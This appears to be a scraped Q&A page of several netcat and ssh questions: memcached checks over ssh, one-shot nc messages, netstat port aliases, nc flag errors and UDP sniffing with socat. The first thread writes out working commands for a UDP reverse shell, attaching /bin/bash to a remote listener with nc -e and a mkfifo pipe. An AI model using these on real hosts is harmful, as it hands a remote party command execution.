I want to get a reverse shell over UDP using netcat. Netcat by default sends traffic over TCP, so in order to send it over UDP I run the -u option like this:
Host 1:
nc.traditional -l -p 4444 -v -u
Host 2:
nc.traditional localhost 4444 -e /bin/bash -u
But when I type a bash command I do not get the output. Why is that?
There are several problems with this:
You use localhost on Host 2. This is a special hostname that refers to the current host, not to Host 1.
UDP has no connections. Host 1 won't know where to send packets if it doesn't receive a message first.
bash reads input character by character, which doesn't work well with non-stream packet based data.
You can instead connect nc and bash with streams, and then send an immediate packet so that Host 1 will know where to send the commands you enter:
Host1:
nc.traditional -l -p 4444 -v -u
Host 2:
mkfifo fifo
nc.traditional -u host1 4444 < fifo |
{
echo "Hi"
bash
} > fifo
Related
I need to ssh into memcached servers and execute ensure connectivity.
I am supposed to re-use the same ssh connection and keep executing the commands whose output will be stored in some log. This is supposed to be a scheduled job which runs at some specific intervals.
Code 1 makes multiple ssh connections for each execution.
#!/bin/bash
USERNAME=ec2-user
HOSTS="10.243.107.xx 10.243.124.xx"
KEY=/home/xxx/xxx.pem
SCRIPT="echo stats | nc localhost 11211 | grep cmd_flush"
for HOSTNAME in ${HOSTS} ; do
ssh -l ${USERNAME} -i ${KEY} ${HOSTNAME} "${SCRIPT}"
done
Code 2 hangs after ssh.
#!/bin/bash
USERNAME=ec2-user
KEY=/home/xxx/xxx.pem
ssh -l ${USERNAME} -i ${KEY} 10.243.xx.xx
while:
do
echo stats | nc localhost 11211 | grep cmd_flush
sleep 1
done
Is there any better way of doing this?
Since you want to have Code 2 run the infinite while loop on the remote host, you can pass that whole thing to the ssh command, after fixing the while statement:
#!/bin/bash
USERNAME=ec2-user
KEY=/home/xxx/xxx.pem
ssh -l ${USERNAME} -i ${KEY} 10.243.xx.xx '
while true
do
echo stats | nc localhost 11211 | grep cmd_flush
sleep 1
done
'
I have to warn that I think the whole approach is somewhat fragile, though. Long-standing ssh connections tend to die for various reasons, which don't always mean the connectivity is actually broken. Make sure the parent script that calls this notices dropped ssh connections and tries again. I guess you can put this script in a loop, and maybe log a warning each time the connection is dropped, and log an error if the connection cannot be re-established.
Basically, I have saved a command that connects to a specific port in order to message in Terminal with another Mac.
$ nc -n -v -l (port)
$ nc -n -v (ip) (port) # --> When the .command file is opened, will run directly.
However, when the .command file is opened the entire feed just stops. I would like it to send a message immediately then close the connection. What would the code
If you want to keep the connection listening you would use -kl (keep listening).
nc -n -v -kl (port)
With the other connection you can immediately send data and close the connection by:
nc -n -v (ip) (port) < <(echo "hello, world!")
The listening connection should stay alive and wait for further connections...
I have a small Java ServerSocket application that is running on port 4444. I wanted to see the process using that port in my OSX terminal, and my first thought was to do the following:
netstat -a | grep 4444 however, this doesn't give me any results.
lsof -i :4444 and I get the following (correct) result:
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
java 66389 admin 18u IPv6 0x1ae123a422ebe931 0t0 TCP *:krb524 (LISTEN)
Could someone tell me why netstat doesn't show the port but lsof does?
Netstat probably does list your task, but with an alias 'krb524' instead of the port number. Those aliases are listed in /etc/services.
$ grep 4444 /etc/services
krb524 4444/udp # KRB524
krb524 4444/tcp # KRB524
To see just port numbers with netstat, add the -n parameter.
netstat -a -n | grep 4444
I execute my bash script PLCCheck as process
./PLCCheck &
PLCCheck
while read -r line
do
...
def_host=192.168.100.110
def_port=6002
HOST=${2:-$def_host}
PORT=${3:-$def_port}
echo -n "OKConnection" | netcat -u -c $HOST $PORT
done < <(netcat -u -l -p 6001)
It listens on UDP Port 6001.
When I want to execute my second bash script SQLCheck as process that listens on UDP Port 4001
./SQLCheck &
SQLCheck
while read -r line
do
...
def_host=192.168.100.110
def_port=6002
HOST=${2:-$def_host}
PORT=${3:-$def_port}
echo -n "OPENEF1" | netcat -u -c $HOST $PORT
done < <(nc -l -p 4001)
I got this error:
Error: Couldn't setup listening socket (err=-3)
Port 6001 and 4001 are open in the iptables and both scripts work as a single process. Why do I get this error?
I have checked the man page of nc. I think it is used on a wrong way:
-l Used to specify that nc should listen for an incoming connection rather
than initiate a connection to a remote host. It is an error to use this
option in conjunction with the -p, -s, or -z options. Additionally,
any timeouts specified with the -w option are ignored.
...
-p source_port
Specifies the source port nc should use, subject to privilege restrictions
and availability. It is an error to use this option in conjunction with the
-l option.
According to this one should not use -l option with -p option!
Try to use without -p, just nc -l 4001. Maybe this is the error...
From the netcat man page one can sniff / save a TCP stream using something like:
mkfifo data
cat data | nc -l $port | tee -a $fn1 | nc $server $port | tee -a $fn2 > data
So I tried something like the following to do the same for UDP:
mkfifo data
cat data | nc -lu $port | tee -a $fn1 | nc -u $server $port | tee -a $fn2 > data
But it fails miserably, which I assume is because of the race conditions between writing to and reading from data and the pipe out of the tee command meaning I can't guarantee that UDP packets are transmitted one-by-one.
Is there an existing command or tool I can use to sniff UDP conversations without altering the packets? Preferably a 1-liner bash command, though a short ruby or python or whatever script works too.
socat -x "udp-listen:$port" "udp:$server:$host" 2> logfile